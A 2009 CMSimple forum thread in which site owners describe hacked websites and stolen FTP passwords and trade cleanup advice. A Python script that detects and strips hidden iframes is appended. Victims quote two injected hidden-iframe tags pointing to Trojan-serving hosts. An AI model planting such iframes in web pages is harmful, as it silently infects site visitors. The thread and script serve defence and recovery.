General questions about CMSimple
by Tata » Wed Jun 17, 2009 2:29 pm
Yesterday I found that not only was my PC infected by about 50 Trojans, but also all the webpages I have built were hacked. An IFRAME with a "display:hidden" attribute was inserted in almost all HTM and PHP files. Some hacker has found a way of stealing FTP passwords.
The code
<iframe src="h**p://jL.chura.pl/rc/" style="display:none"></iframe>
(**=tp) is mostly inserted just before the last "?>" or "<BODY>". Now I need to:
- Change all FTP passwords
- Download and clear all websites - all possibly infectable files
- Change all login passwords
- Upload them back
- Stop using TotalCommander FTP client
If you experience the same problem and know how to make it easier, please let us know.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
by Connie » Wed Jun 17, 2009 5:27 pm
That's just plain sh..., I can imagine how angry you are now...
keep on!
Connie
by Tata » Wed Jun 17, 2009 9:39 pm
by Holger » Thu Jun 18, 2009 6:46 am
Tata wrote: Some hacker has found a way of stealing FTP passwords
Hmm, are you sure?
Have you checked the server-ftp-logfiles?
Holger
by Tata » Thu Jun 18, 2009 11:22 am
Holger wrote: Hmm, are you sure? Have you checked the server-ftp-logfiles?
Holger
That's what I have found on forums about this danger. And I have not yet studied the log files. I have been working on reinstalling my home and office PCs since yesterday. I have read that the TotalCommander FTP client has (up to version 7.4x) some holes and poorly encrypted passwords. So the virus searches for the wcx_ftp.ini file. If found, it reads all logins saved in it and uses them to intrude and sends them over to other computers. The page inserted in this hidden IFRAME seems to be full of Trojans.
by CMSimple-Styles.com » Thu Jun 18, 2009 11:33 am
I can recommend PrevX Security; it is not well known, but in my opinion the best antivirus detection. Let it run on your PC, it may help.
by Martin » Thu Jun 18, 2009 12:40 pm
That sounds mean, sounds like your local machine is infected with some variant of the file infector virus "virut". Perhaps you have better luck, but it would be hard to get rid of this one, because you could not trust any of your "exe" and "scr" files. Perhaps you find an easier solution, but probably you would have to reformat your disk and reinstall your OS (without any .exe or .scr file from your "old" system) and clean up all your .html, .php and .asp files (with an editor with no html-preview) and change all your banking, email ... passwords.
I really hope you do not have to go through this long story of work and loss!
Martin
by Tata » Thu Jun 18, 2009 7:27 pm
Actually, it is 21:25 right now and I have succeeded in reformatting one of my 2 infected PCs entirely, and I am starting from "0" now. I have no idea how much time I will spend on downloading/cleaning/uploading all the websites I have access to. Brrrrrrrrrrrrrrr
by gerepeer » Sat Jul 11, 2009 1:15 am
Hello,
Last night I saw that 2 of my sites were down and went to take a look. It seems that someone found out my passwords or a way into CMSimple, or I did not have the rights set right, but I found out that in every folder every index.php or index.html file was changed and an iframe was added.
<iframe src="http://a5h.ru:8080/ts/in.cgi?pepsi97" width=125 height=125 style="visibility: hidden"></iframe>
I was not able to find out what this was meant to lead to, but maybe someone who speaks/reads Russian is able to tell me what they intended.
Fortunately I have some backups, but if it turns out that hackers have found a way in, then the community should start to worry.
Hope it's just me and I will have to study chmod rights again.
Gerepeer
by Tata » Sat Jul 11, 2009 7:08 am
Well, there is nothing in Russian. But I have found in some forum what this is about. The hacker has written a script that reads the file containing your TotalCommander FTP passwords. They are obviously poorly encrypted. Then it puts this hidden IFRAME into any index.php, index.htm (in my case also into any HTM) file, not only on your websites but also on your local PC. The visitor is then invisibly redirected to a page from which it loads a bunch of Trojans. The only way to solve this horror is (at least I must do it):
- Download all websites to our HDD
- With Notepad++ or PSPad, search for the IFRAME code and replace it with an empty line
- Upload everything back
- Delete all passwords from the FTP client
There is still the danger that your PC is full of Trojans rewriting any EXE. But this is another story. Maybe there are already some removers on the net. But there weren't any 3 weeks ago and I needed to re-install my entire PC.
In this case:
- Make an exact copy of all important files on a removable drive.
- reformat your infected partitions
- install your OS
- install your antivirus
- install PSPad
- search for the IFRAME code and replace it with an empty line in any file on your removable drive - if you find any there.
I am sorry for you. But enjoy the least creative work on PC.
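The search-and-replace cleanup described in this thread can be scripted over a downloaded copy of a site. The following is an added example, not part of any post above: it removes only iframes whose inline style hides them (the pattern in both quoted samples) and keeps each original as a `.infected` copy. The function names and the sample host are assumptions made for illustration.

```python
import re
from pathlib import Path

# Any <iframe ...>...</iframe>; the attribute string is captured for inspection.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>.*?</iframe\s*>", re.I | re.S)
# Inline styles that hide the frame, as in the two samples quoted in this thread.
HIDDEN_RE = re.compile(r"(display\s*:\s*none|visibility\s*:\s*hidden)", re.I)
WEB_SUFFIXES = {".htm", ".html", ".php"}


def strip_hidden_iframes(text):
    """Return (cleaned_text, removed_tags); visible iframes are left alone."""
    removed = []

    def _sub(match):
        if HIDDEN_RE.search(match.group(1)):
            removed.append(match.group(0))
            return ""
        return match.group(0)

    return IFRAME_RE.sub(_sub, text), removed


def clean_tree(root, dry_run=True):
    """Scan a downloaded site copy; return {path: [removed tags]}.

    With dry_run=False the original is kept as <name>.infected and the
    cleaned text is written in place.
    """
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_SUFFIXES:
            continue
        raw = path.read_bytes()
        text = raw.decode("latin-1")  # byte-preserving for any 8-bit encoding
        cleaned, removed = strip_hidden_iframes(text)
        if removed:
            findings[str(path)] = removed
            if not dry_run:
                path.with_name(path.name + ".infected").write_bytes(raw)
                path.write_bytes(cleaned.encode("latin-1"))
    return findings


# Constructed sample (placeholder host, not a value from the thread).
SAMPLE = ('<?php echo "hi";\n'
          '<iframe src="http://bad.example.invalid/x" style="display:none"></iframe>?>\n'
          '<iframe src="/map.html" width="400" height="300"></iframe>\n')

if __name__ == "__main__":
    print(len(strip_hidden_iframes(SAMPLE)[1]), "hidden iframe(s) removed")
```

Run `clean_tree(path)` first as a dry run and review the reported tags before calling it with `dry_run=False`; a site that legitimately uses hidden iframes would otherwise lose them.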